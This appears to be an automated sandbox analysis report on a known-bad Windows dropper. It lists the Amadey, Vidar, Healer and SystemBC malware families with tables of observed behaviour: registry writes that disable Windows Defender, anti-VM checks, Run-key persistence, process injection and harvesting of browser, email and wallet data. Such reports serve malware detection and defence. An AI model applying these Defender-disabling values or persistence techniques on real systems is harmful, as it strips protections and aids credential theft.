Analysis Overview
SHA256
97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
Threat Level: Known bad
The file 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2 was found to be: Known bad.
Malicious Activity Summary
Healer family
Amadey
Healer
Detects Healer, an antivirus disabler dropper
Gcleaner family
Modifies Windows Defender notification settings
Amadey family
Modifies Windows Defender Real-time Protection settings
Systembc family
Vidar family
SystemBC
GCleaner
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender TamperProtection settings
Detect Vidar Stealer
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Uses browser remote debugging
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Identifies Wine through registry keys
Checks BIOS information in registry
Reads data files stored by FTP clients
Windows security modification
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Looks up external IP address via web service
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Browser Information Discovery
Program crash
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Checks processor information in registry
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Delays execution with timeout.exe
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-24 13:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-24 13:24
Reported
2025-02-24 13:26
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f87af9d1cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\f87af9d1cb.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1452 set thread context of 1748 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 1644 set thread context of 2444 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3492 set thread context of 624 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 880 set thread context of 3516 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
